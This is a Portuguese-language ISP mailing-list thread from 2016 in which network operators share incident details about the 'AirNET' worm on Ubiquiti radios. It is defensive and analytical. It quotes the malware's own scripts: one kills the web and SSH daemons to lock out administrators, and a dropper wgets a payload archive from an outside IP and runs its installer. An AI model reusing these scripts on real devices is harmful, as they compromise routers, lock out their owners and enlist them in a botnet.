[GTER] RES: Vírus ubnt
Bruno Cabral
bruno at openline.com.br
Thu Oct 13 16:06:37 -03 2016
Captura senhas em https e SSH? Hardcore mesmo ;-)
> To: gter at eng.registro.br
> From: alexandre at onda.net.br
> Date: Thu, 13 Oct 2016 12:37:11 -0300
> Subject: Re: [GTER] RES: Vírus ubnt
>
> Ele não deixa SSH nem WEB.. digamos que o worm é hardcore eheheheh...
>
> Ele captura senhas na rede, tem todo um processo de captura etc... por
> isso ele entra em radios mesmo sem vulnerabilidade...
>
>
> Em 13/10/2016 11:06, Emerson Araujo escreveu:
> > Alexandre, conseguiu identificar pra qual senha/usuario ele altera? Ou é
> > aleatório?
> >
> > Em 13 de outubro de 2016 10:51, Márcio Elias Hahn do Nascimento <
> > marcio at sulonline.net> escreveu:
> >
> >>
> >> Obrigado pelas informações Alexandre.
> >>
> >> Realmente não tive nenhum
> >> equipamento com esse problema.
> >>
> >> Versões entre 4x (equipamentos beem
> >> antigos antes da linha MiMo, poucos, mais tem...) e todos os tipos de
> >> 5.x (embora a grande maioria seja 5.6.6).
> >>
> >> Detalhe.
> >>
> >> Todas as portas
> >> entre 0-1024 estão fechadas para o mundo e abertas apenas para uma rede
> >> de gerência.
> >>
> >> ---
> >>
> >> Att
> >>
> >> Márcio Elias Hahn do Nascimento
> >> (48) 8469-1819
> >> / 3524-0700 - marcio at sulonline.net
> >> INOC-BR: 52977*100
> >> GERÊNCIA DE
> >> RECURSOS DE TIC - Sul Internet [5]
> >>
> >> [5]
> >>
> >> Em 13/10/2016 10:21,
> >> Alexandre J. Correa (Onda) escreveu:
> >>
> >>> no /etc/persistent/ deve conter
> >> alguns arquivos, por exemplo o rc.poststart
> >>> que contem:
> >>>
> >>>
> >> owned() {
> >>> sleep 10
> >>> kill -HUP 1 1>/dev/null 2>/dev/null
> >>> kill -9
> >> `pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
> >>> }
> >>>
> >>>
> >> /var/etc/persistent/AirNET init
> >>> ( owned ) &
> >>>
> >>> há um arquivo chamado
> >> porra.sh também, que é por onde ele baixa o 'kit'
> >>> e executa a
> >> instalação:
> >>> #!/bin/sh
> >>>
> >>> rm -rf /tmp/AirNET*
> >>> wget -q
> >> http://5.196.50.44/mips/AirNET.tgz [4]-O /tmp/AirNET.tgz
> >>> if [ -f
> >> "/tmp/AirNET.tgz" ]; then
> >>> mkdir -p /tmp/AirNET
> >>> tar xzf
> >> /tmp/AirNET.tgz -C /tmp/AirNET
> >>> rm -rf /tmp/AirNET.tgz
> >>> cd
> >> /tmp/AirNET
> >>> sh install.sh
> >>> else
> >>> echo "error: wget"
> >>> fi
> >>> rm -rf
> >> /tmp/AirNET*
> >>> Esta variante o desenvolvedor foi mais inteligente,
> >> ele compilou o
> >>> daemon, dificultando a identificação do que ele faz...
> >> consegui
> >>> decodificar e ele entra em uma rede de IRC e provavelmente
> >> recebe
> >>> comandos pelo IRC mesmo. Imagino que o cara deva ter uma
> >> botnet grande !!!
> >>> Em 13/10/2016 09:56, Márcio Elias Hahn do
> >> Nascimento escreveu:
> >>>> Pessoal, a discussão está muito dispersa e
> >> com muitas informações desencontradas. Qual a assinatura desse vírus?
> >> (como eu digo que um equipamento está ou não infectado? Arquivos
> >> alterados/criados, perda de acesso, alteração de portas, etc). O ideal
> >> seria um posicionamento definitivo sobre isso. Outra, sobre a versão
> >> segura ou não, é utopia, segurança da informação não existe a nível de
> >> 100%, então chego a 2 conclusões. 1 - Não vou sair atualizando milhares
> >> de equipamentos. 2 - Vou tratar de fechar a porta para não entrar quem
> >> não deve. --- Att Márcio Elias Hahn do Nascimento (48) 8469-1819 /
> >> 3524-0700 - marcio at sulonline.netINOC-BR: 52977*100 GERÊNCIA DE RECURSOS
> >> DE TIC - Sul Internet [3] [3] Em 13/10/2016 08:43, Adriano B. Lima
> >> escreveu:
> >>>>>> Há um novo virus, chamado AirNET, ele consegue
> >> capturar as senhas
> >>>> digitadas.. e utliza além da senhas padrões, as
> >> senhas capturadas para acesso aos radios.. ele bloqueia ssh e web...
> >> somente reset para remover... Fwd: a
> >>>>> Alexandre, resetando o
> >> equipamento limpa este
> >>>> vírus ou é preciso algum procedimento de
> >> remoção? Outra pergunta, as versões 5.6.9 também estão
> >> alexandre at onda.net.br> escreveu:
> >> https://eng.registro.br/mailman/listinfo/gter[1] -- gter list
> >> http://www.sulinternet.net [3] -- gter list
> >> https://eng.registro.br/mailman/listinfo/gter [2]
> >>> --
> >>>
> >> Fwd: a
> >>> *Alexandre Jeronimo Correa* / CEO
> >>> _alexandre at onda.net.br
> >> <mailto:alexandre at onda.net.br>_ / Office +55 34
> >>> 3351 - 3077
> >>>
> >>>
> >> *ONDA INTERNET*
> >>> +55 34 3351-3077
> >>> Av. Benedito Valadares, 217 -
> >> Centro - Sacramento - MG - BR
> >>> _http://www.onda.net.br
> >> <http://www.onda.net.br/ [1]>_
> >>> --
> >>> gter list
> >> https://eng.registro.br/mailman/listinfo/gter [2]
> >>
> >>
> >> Links:
> >> ------
> >> [1]
> >> http://www.onda.net.br/
> >> [2]
> >> https://eng.registro.br/mailman/listinfo/gter
> >> [3]
> >> https://eng.registro.br/mailman/listinfo/g<div>
> >>
> >> > ng.registro.br/mailman/listinfo/gter"&
> >> gt;https://eng.registro.br/mailman/listinfo/gter [2] http://ww
> >> </div>/</a>[3]<ahref=
> >> [4]
> >> http://5.196.50.44/mips/AirNET.tgz
> >> [5] http://www.sulinternet.net
> >> --
> >> gter list https://eng.registro.br/mailman/listinfo/gter
> >>
> >
> >
>
>
> --
> Fwd: a
>
>
>
>
>
>
> *Alexandre Jeronimo Correa* / CEO
> _alexandre at onda.net.br <mailto:alexandre at onda.net.br>_ / Office +55 34
> 3351 - 3077
>
> *ONDA INTERNET*
> +55 34 3351-3077
> Av. Benedito Valadares, 217 – Centro – Sacramento – MG - BR
> _http://www.onda.net.br <http://www.onda.net.br/>_
>
>
> --
> gter list https://eng.registro.br/mailman/listinfo/gter
More information about the gter
mailing list